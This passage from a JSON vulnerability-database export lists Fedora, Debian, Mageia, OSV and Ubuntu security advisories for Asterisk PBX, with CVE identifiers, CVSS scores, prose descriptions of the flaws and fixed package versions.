Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2013-01-30T00:33:07", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.2.0-1.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-30T00:33:07", "id": "FEDORA:3C5CC215B2", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PLNQEC2NQSAUC3H2G37RXU7W7UR2HEJ3/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2013-04-07T00:44:42", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: asterisk-10.12.2-1.fc17", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2686"], "modified": "2013-04-07T00:44:42", "id": "FEDORA:6D7AD209F1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3U55MPXOBJMG3ODKN2ZYSIKCMFOLQKXJ/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2014-01-08T07:59:22", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: asterisk-11.7.0-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2014-01-08T07:59:22", "id": "FEDORA:6E56421203", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NH6SJOXUPCA7IUTU5ZDAXY5ERYNPM7YH/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2014-01-08T07:50:47", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.7.0-1.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2014-01-08T07:50:47", "id": "FEDORA:307A42200F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NL6GDXU6TYEDRWDOL34OZTF4QDFIJ2BS/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2014-01-08T07:55:08", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: asterisk-11.7.0-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2014-01-08T07:55:08", "id": "FEDORA:0DA4021EBA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/L3GH3J63NCOURDYZBE2BFUXEYND5JJ7X/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "description": "Asterisk is a complete PBX in software. It runs on Linux and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in three protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. 
", "cvss3": {}, "published": "2013-04-07T00:28:33", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: asterisk-11.2.2-1.fc18", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-07T00:28:33", "id": "FEDORA:69DC620A83", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/63UN3F2NNQ3XWHJNUSV4P3WC3M23ULYG/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T23:39:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2749-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 02, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-5641 CVE-2013-5642\n\nColin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony \ntoolkit -, which could result in denial of service.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk 
packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2013-09-02T14:48:20", "type": "debian", "title": "[SECURITY] [DSA 2749-1] asterisk security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-02T14:48:20", "id": "DEBIAN:DSA-2749-1:E342B", "href": "https://lists.debian.org/debian-security-announce/2013/msg00160.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-21T23:38:23", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2605-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 13, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5976 CVE-2012-5977\nDebian Bug : 697230\n\nSeveral vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze9.\n\nFor the testing distribution (wheezy) and unstable distribution 
(sid),\nthese problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2013-01-13T20:36:39", "type": "debian", "title": "[SECURITY] [DSA 2605-1] asterisk security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-13T20:36:39", "id": "DEBIAN:DSA-2605-1:42394", "href": "https://lists.debian.org/debian-security-announce/2013/msg00009.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-21T23:38:31", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2605-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 19, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-5976 CVE-2012-5977\nDebian Bug : 697230 698112 698118\n\nThe security update released in DSA 2605 for Asterisk, caused a\nregression that could lead to crashes. Updated packages have now been\nmade available to correct that behaviour. 
For reference, the original\nadvisory text follows.\n\nSeveral vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze10.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2013-01-19T14:01:19", "type": "debian", "title": "[SECURITY] [DSA 2605-2] asterisk regression update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2013-01-19T14:01:19", "id": "DEBIAN:DSA-2605-2:4DD7B", "href": "https://lists.debian.org/debian-security-announce/2013/msg00013.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-21T23:24:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2835-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 05, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : 
asterisk\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-7100\nDebian Bug : 732355\n\nJan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk. \n\nAn additional change was backported, which is fully described in\nhttp://downloads.asterisk.org/pub/security/AST-2013-007.html\n\nWith the fix for AST-2013-007, a new configuration option was added in \norder to allow the system administrator to disable the expansion of \n"dangerous" functions (such as SHELL()) from any interface which is not \nthe dialplan. In stable and oldstable this restriction is disabled by default.\nTo enable the restriction add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\n live_dangerously = no\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1:1.6.2.9-2+squeeze12.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-01-05T16:38:46", "type": "debian", "title": "[SECURITY] [DSA 2835-1] asterisk security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2014-01-05T16:38:46", "id": "DEBIAN:DSA-2835-1:D99AD", "href": "https://lists.debian.org/debian-security-announce/2014/msg00003.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "A remotely exploitable crash vulnerability exists in the SIP channel driver if an ACK with SDP is received after the channel has been terminated. The handling code incorrectly assumes that the channel will always be present (CVE-2013-5641). A remotely exploitable crash vulnerability exists in the SIP channel driver if an invalid SDP is sent in a SIP request that defines media descriptions before connection information. The handling code incorrectly attempts to reference the socket address information even though that information has not yet been set (CVE-2013-5642). 
\n", "cvss3": {}, "published": "2013-08-30T17:36:06", "type": "mageia", "title": "Updated asterisk package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-08-30T17:36:06", "id": "MGASA-2013-0266", "href": "https://advisories.mageia.org/MGASA-2013-0266.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated asterisk packages fix security vulnerability: Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message (CVE-2013-7100). The updated packages have been upgraded to the 11.7.0 version which resolves various upstream bugs and is not vulnerable to this issue. 
\n", "cvss3": {}, "published": "2013-12-23T17:15:47", "type": "mageia", "title": "Updated asterisk packages fix CVE-2013-7100\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2013-12-23T17:15:47", "id": "MGASA-2013-0384", "href": "https://advisories.mageia.org/MGASA-2013-0384.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated asterisk packages fix security vulnerabilities: In Asterisk before 11.6.1, a 16 bit SMS message that contains an odd message length value will cause the message decoding loop to run forever. The message buffer is not on the stack but will be overflowed resulting in corrupted memory and an immediate crash (CVE-2013-7100). In Asterisk before 11.6.1, external control protocols, such as the Asterisk Manager Interface, often have the ability to get and set channel variables; this allows the execution of dialplan functions. Reading the SHELL() function can execute arbitrary commands on the system Asterisk is running on. Writing to the FILE() function can change any file that Asterisk has write access to. When these functions are executed from an external protocol, that execution could result in a privilege escalation (AST-2013-007). In Asterisk before 11.8.1, sending a HTTP request that is handled by Asterisk with a large number of Cookie headers could overflow the stack. You could even exhaust memory if you sent an unlimited number of headers in the request (CVE-2014-2286). 
In Asterisk before 11.8.1, an attacker can use all available file descriptors using SIP INVITE requests. Each INVITE meeting certain conditions will leak a channel and several file descriptors. The file descriptors cannot be released without restarting Asterisk which may allow intrusion detection systems to be bypassed by sending the requests slowly (CVE-2014-2287). \n", "cvss3": {}, "published": "2014-04-15T18:22:45", "type": "mageia", "title": "Updated asterisk packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100", "CVE-2014-2286", "CVE-2014-2287"], "modified": "2014-04-15T18:22:45", "id": "MGASA-2014-0171", "href": "https://advisories.mageia.org/MGASA-2014-0171.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:09:45", "description": "\nColin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony \ntoolkit -, which could result in denial of service.\n\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\n\nWe recommend that you upgrade your asterisk packages.\n\n\n", "edition": 1, "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "osv", "title": "asterisk - several", 
"bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2022-08-10T07:09:04", "id": "OSV:DSA-2749-1", "href": "https://osv.dev/vulnerability/DSA-2749-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-21T08:30:12", "description": "\nSeveral vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\n\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze10.\n\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\n\nWe recommend that you upgrade your asterisk packages.\n\n\n", "edition": 1, "cvss3": {}, "published": "2013-01-19T00:00:00", "type": "osv", "title": "asterisk - several issues", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2022-07-21T05:47:52", "id": "OSV:DSA-2605-1", "href": "https://osv.dev/vulnerability/DSA-2605-1", 
"cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-10T07:06:26", "description": "\nJan Juergens discovered a buffer overflow in the parser for SMS messages\nin Asterisk.\n\n\nAn additional change was backported, which is fully described in\n<http://downloads.asterisk.org/pub/security/AST-2013-007.html>\n\n\nWith the fix for AST-2013-007, a new configuration option was added in\norder to allow the system adminitrator to disable the expansion of\ndangerous functions (such as SHELL()) from any interface which is not\nthe dialplan. In stable and oldstable this option is disabled by default.\nTo enable it add the following line to the section '[options]' in\n/etc/asterisk/asterisk.conf (and restart asterisk)\n\n\n\n```\nlive\\_dangerously = no\n```\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1:1.6.2.9-2+squeeze12.\n\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1:1.8.13.1~dfsg1-3+deb7u3.\n\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:11.7.0~dfsg-1.\n\n\nWe recommend that you upgrade your asterisk packages.\n\n\n", "edition": 1, "cvss3": {}, "published": "2014-01-05T00:00:00", "type": "osv", "title": "asterisk - buffer overflow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2022-08-10T07:06:07", "id": "OSV:DSA-2835-1", "href": 
"https://osv.dev/vulnerability/DSA-2835-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:25:45", "description": "main/http.c in the HTTP server in Asterisk Open Source 1.8.x before\n1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk\n1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones 10.x-digiumphones\nbefore 10.12.2-digiumphones does not properly restrict Content-Length\nvalues, which allows remote attackers to conduct stack-consumption attacks\nand cause a denial of service (daemon crash) via a crafted HTTP POST\nrequest. NOTE: this vulnerability exists because of an incorrect fix for\nCVE-2012-5976.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=704114>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | This is due to an incorrect fix for CVE-2012-5976\n", "cvss3": {}, "published": "2013-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2013-2686", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2686"], "modified": "2013-04-01T00:00:00", "id": "UB:CVE-2013-2686", "href": "https://ubuntu.com/security/CVE-2013-2686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:24:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x\nbefore 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified\nAsterisk 1.8.15 before 1.8.15-cert3 and 11.2 
before 11.2-cert2; and\nAsterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows\nremote attackers to cause a denial of service (NULL pointer dereference,\nsegmentation fault, and daemon crash) via an invalid SDP that defines a\nmedia description before the connection description in a SIP request.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=721220>\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-09T00:00:00", "id": "UB:CVE-2013-5642", "href": "https://ubuntu.com/security/CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:24:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source\n1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1\nand Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before\n11.2-cert2 allows remote attackers to cause a denial of service (NULL\npointer dereference, segmentation fault, and daemon crash) via an ACK with\nSDP to a previously terminated channel. 
